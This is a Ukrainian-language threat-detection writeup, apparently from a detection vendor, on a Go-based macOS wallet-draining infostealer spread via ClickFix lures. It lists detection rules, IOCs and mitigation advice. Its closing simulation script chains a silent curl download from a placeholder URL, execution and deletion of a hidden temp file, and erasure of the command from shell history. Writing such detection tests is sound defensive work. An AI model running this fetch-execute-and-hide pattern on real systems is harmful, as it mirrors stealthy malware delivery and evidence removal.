Інфостілер macOS націлюється на криптовалютні гаманці
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Стилер для macOS, розроблений на Go, цілиться на користувачів криптовалют через кампанію соціальної інженерії ClickFix. Шкідливе програмне забезпечення краде чутливі облікові дані з Apple Keychain і браузерних магазинів, а також має можливість поступово виснажувати баланси криптовалютних гаманців жертв. Цепочка інфекції починається з профайлера скрипту оболонки, який доставляє архітектурно-специфічні Mach-O навантаження.
Розслідування
Аналітики Huntress виявили загрозу під час ретроспективного полювання і ідентифікували компоненти стилера, специфічного для macOS, який залишався активним протягом приблизно трьох місяців. Розслідування пов’язало підтримуючу інфраструктуру з Aeza Group, санкціонованим російським провайдером куленепробивного хостингу. Дослідники реконструювали ланцюг атаки від початкового запиту соціальної інженерії ClickFix до фінального виконання навантаження і зв’язку C2.
Пом’якшення
Користувачі повинні уникати взаємодії з підозрілими запитами CAPTCHA або слідувати незвичайним інструкціям, які вимагають введення команд у Terminal. Розширення браузерів, призначені для обмеження шкідливих скриптів, такі як NoScript, та інструменти блокування на базі DNS, такі як Pi-hole, можуть допомогти знизити рівень загрози. Комплексне навчання користувачів, спрямоване на соціальну інженерію ClickFix, залишається одним із найефективніших захисних заходів.
Відповідь
Якщо виявлено інфекцію, уражена система macOS повинна бути негайно ізольована, щоб зупинити подальше викрадення даних або виснаження криптовалютного гаманця. Адміністратори повинні знайти і видалити всі шкідливі Mach-O бінарники та пов’язані з ними механізми зберігання. Оскільки шкідливе ПО націлюється на облікові дані, паролі для всіх облікових записів, до яких отримали доступ із скомпрометованого пристрою, слід змінити.
Потік атаки
Виявлення
Запуск Launchctl з нестандартного шляху (через процес створення)
Proof of Value
Можливе намагання енумерації System_profiler (через процес створення)
Proof of Value
Підозріле виконання Curl [MacOS] (через команду)
Proof of Value
IOC (HashSha256) для виявлення: Шкідливе ПО для macOS, яке виснажує гаманці, потребує вашу криптовалюту
Proof of Value
IOC (SourceIP) для виявлення: Шкідливе ПО для macOS, яке виснажує гаманці, потребує вашу криптовалюту
Proof of Value
IOC (DestinationIP) для виявлення: Шкідливе ПО для macOS, яке виснажує гаманці, потребує вашу криптовалюту
Proof of Value
Виявлення стійкості і методів виконання шкідливого ПО для MacOS [Linux File Event]
Proof of Value
Атака Шкідливого ПО для macOS, яке виснажує гаманці [Linux Process Creation]
Proof of Value
Імітація виконання
Передумова: Перевірка телеметрії та базового рівня повинна бути пройдена.
Обґрунтування: У цьому розділі детально описано точне виконання техніки супротивника (TTP), розробленої для запуску правила виявлення. Команди та наратив ПОВИННІ безпосередньо віддзеркалювати ідентифіковані TTP та мати на меті генерування точної телеметрії, очікуваної детекторною логікою. Абстрактні або не зв’язані приклади призведуть до помилкової діагностики.
-
Опис атаки & Команди: Супротивник ініціює шахрайство ClickFix. Жертву обманюють, змушуючи запустити команду у своєму терміналі. Команда використовує
curl -kFsSLщоб непомітно завантажити шкідливий скрипт. Щоб уникнути залишення слідів, скрипт виконується через однолайновий код bash, який негайно видаляє свій тимчасовий файл (.UlaccK). Нарешті, атакувальник виконує складнуhistoryкоманди для хірургічного видалення команди з історії оболонки користувача, роблячи атаку невидимою для випадкового судрофорензичного огляду. -
Скрипт регресійного тестування:
#!/bin/bash # Імітація атаки на macOS від ClickFix # Цей скрипт імітує точні патерни рядків, необхідні для правила виявлення. echo "[+] Початок імітації..." # 1. Імітація завантаження curl (Вибір 3) # 2. Імітація виконання bash і негайного видалення (Вибір 1) # 3. Імітація маніпуляції з history (Вибір 2) # Ми комбінуємо це в один рядок, щоб імітувати поведінковий патерн # Примітка: Ми використовуємо фіктивний URL, щоб уникнути фактичного виконання шкідливого ПО curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}') echo "[+] Команда імітації виконана." echo "[!] Перевірте свій SIEM на попередження 'Атака Шкідливого ПО для macOS, яке виснажує гаманці'." -
Команди очищення:
# Видалити будь-які артефакти, залишені симуляцією rm -f .UlaccK # Примітка: Маніпуляція з history у скрипті призначена для імітації уникнення; # може знадобитися ручне відновлення history для користувача, що тестує.